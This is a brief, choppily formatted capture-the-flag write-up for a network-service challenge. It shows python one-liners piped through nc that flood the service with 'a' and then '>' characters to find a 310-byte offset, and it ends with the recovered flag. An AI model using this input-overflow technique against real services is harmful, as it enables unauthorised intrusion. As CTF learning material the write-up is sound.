Access the network service at url:cfta-bx01.allyourbases.co
and port:8012
and find a way to get the flag by formatting a valid request.
python -c "print('a'*700)" | nc cfta-bx01.allyourbases.co 8012
311
, so the offset is 310
.python -c "print('a'*310)" | nc cfta-bx01.allyourbases.co 8012
simply outputs:>
s instead of a
s to terminate the angle brackets and get the flag: python -c "print('>'*310)" | nc cfta-bx01.allyourbases.co 8012
:AlOnGSeaRcHFoROverWriTe